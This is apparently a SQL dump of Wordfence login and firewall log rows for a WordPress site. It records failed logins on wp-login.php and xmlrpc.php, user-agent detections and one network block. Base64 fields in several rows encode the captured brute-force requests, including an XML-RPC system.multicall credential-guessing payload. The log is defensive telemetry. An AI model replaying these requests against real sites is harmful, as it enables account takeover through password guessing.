(3,0.000000,1691937491.116636,'\0\0\0\0\0\0\0\0\0\0&',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),
(4,0.000000,1691937493.499446,'\0\0\0\0\0\0\0\0\0\0&',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),
(5,1691937637.991000,1691937637.332942,'\0\0\0\0\0\0\0\0\0\03Y*',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(6,1691937640.488500,1691937639.945858,'\0\0\0\0\0\0\0\0\0\03Y*',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwNgpDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(7,1691937643.252600,1691937642.492782,'\0\0\0\0\0\0\0\0\0\03Y*',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc5CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(8,1691937797.924700,1691937797.289712,'\0\0\0\0\0\0\0\0\0\0(',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(9,1691937800.311000,1691937799.749447,'\0\0\0\0\0\0\0\0\0\0(',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwNwpDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(10,1691937802.974900,1691937802.486316,'\0\0\0\0\0\0\0\0\0\0(',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc4CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(11,1691937976.906000,1691937976.264860,'\0\0\0\0\0\0\0\0\0\0d',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(12,1691937978.970800,1691937978.710351,'\0\0\0\0\0\0\0\0\0\0d',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwMApDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(13,1691937981.284900,1691937981.021274,'\0\0\0\0\0\0\0\0\0\0d',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc1CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(14,0.000000,1691937988.057387,'\0\0\0\0\0\0\0\0\0\0%.',0,503,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),
(15,1691938201.365800,1691938201.104615,'\0\0\0\0\0\0\0\0\0\0d',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(16,1691938203.057400,1691938202.788288,'\0\0\0\0\0\0\0\0\0\0d',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwNQpDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(17,1691938204.993000,1691938204.730118,'\0\0\0\0\0\0\0\0\0\0d',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDgxCkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(18,1691938350.837300,1691938350.589234,'\0\0\0\0\0\0\0\0\0\0AY',0,200,0,0,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','learned:waf','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true}'),
(19,1691938353.900500,1691938353.646747,'\0\0\0\0\0\0\0\0\0\0AY',0,200,0,1,0,'https://gsw2023.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAvd3AtbG9naW4ucGhwIEhUVFAvMS4xClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IFVidW50dTsgTGludXggeDg2XzY0OyBydjo2Mi4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzYyLjAKSG9zdDogZ3N3MjAyMy5jb20KQ29va2llOiB3b3JkcHJlc3NfdGVzdF9jb29raWU9V1ArQ29va2llK2NoZWNrOwpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQKQ29udGVudC1MZW5ndGg6IDEwMwpDb25uZWN0aW9uOiBjbG9zZQoKbG9nPSU1QnJlZGFjdGVkJTVEJnB3ZD0lNUJyZWRhY3RlZCU1RCZ3cC1zdWJtaXQ9TG9nK0luJnJlZGlyZWN0X3RvPWh0dHBzJTNBJTJGJTJGZ3N3MjAyMy5jb20lMkZ3cC1hZG1pbiUyRiZ0ZXN0Y29va2llPTE=\"}'),
(20,1691938356.652700,1691938356.399724,'\0\0\0\0\0\0\0\0\0\0AY',0,200,0,0,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername','Known malicious User-Agents','{\"learningMode\":1,\"failedRules\":[307],\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"category\":\"brute-force\",\"ssl\":true,\"fullRequest\":\"UE9TVCAveG1scnBjLnBocCBIVFRQLzEuMQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBVYnVudHU7IExpbnV4IHg4Nl82NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4wCkhvc3Q6IGdzdzIwMjMuY29tCkFjY2VwdC1FbmNvZGluZzogZ3ppcApDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApDb250ZW50LUxlbmd0aDogNDc5CkNvbm5lY3Rpb246IGNsb3NlCgolM0MlM0Z4bWwrdmVyc2lvbiUzRCUyMjEuMCUyMiUzRiUzRSUwQSUzQ21ldGhvZENhbGwlM0UlM0NtZXRob2ROYW1lJTNFc3lzdGVtLm11bHRpY2FsbCUzQyUyRm1ldGhvZE5hbWUlM0UlM0NwYXJhbXMlM0UlM0NwYXJhbSUzRSUzQ3ZhbHVlJTNFJTNDYXJyYXklM0UlM0NkYXRhJTNFJTNDdmFsdWUlM0UlM0NzdHJ1Y3QlM0UlM0NtZW1iZXIlM0UlM0NuYW1lJTNFbWV0aG9kTmFtZSUzQyUyRm5hbWUlM0UlM0N2YWx1ZSUzRSUzQ3N0cmluZyUzRXdwLmdldFVzZXJzQmxvZ3MlM0MlMkZzdHJpbmclM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRm1lbWJlciUzRSUzQ21lbWJlciUzRSUzQ25hbWUlM0VwYXJhbXMlM0MlMkZuYW1lJTNFJTNDdmFsdWUlM0UlM0NhcnJheSUzRSUzQ2RhdGElM0UlM0N2YWx1ZSUzRSUzQ2FycmF5JTNFJTNDZGF0YSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGZGF0YSUzRSUzQyUyRmFycmF5JTNFJTNDJTJGdmFsdWUlM0UlM0MlMkZtZW1iZXIlM0UlM0MlMkZzdHJ1Y3QlM0UlM0MlMkZ2YWx1ZSUzRSUzQyUyRmRhdGElM0UlM0MlMkZhcnJheSUzRSUzQyUyRnZhbHVlJTNFJTNDJTJGcGFyYW0lM0UlM0MlMkZwYXJhbXMlM0UlM0MlMkZtZXRob2RDYWxsJTNF\"}'),
(21,0.000000,1691938501.932659,'\0\0\0\0\0\0\0\0\0\0#',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailValidUsername',NULL,NULL),
(22,0.000000,1691938511.998335,'\0\0\0\0\0\0\0\0\0\0#',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailValidUsername',NULL,NULL),
(23,0.000000,1691938519.140553,'\0\0\0\0\0\0\0\0\0\0e<',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailValidUsername',NULL,NULL),
(24,0.000000,1691938526.814837,'\0\0\0\0\0\0\0\0\0\0*t',0,200,0,1,0,'https://gsw2023.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailValidUsername',NULL,NULL),
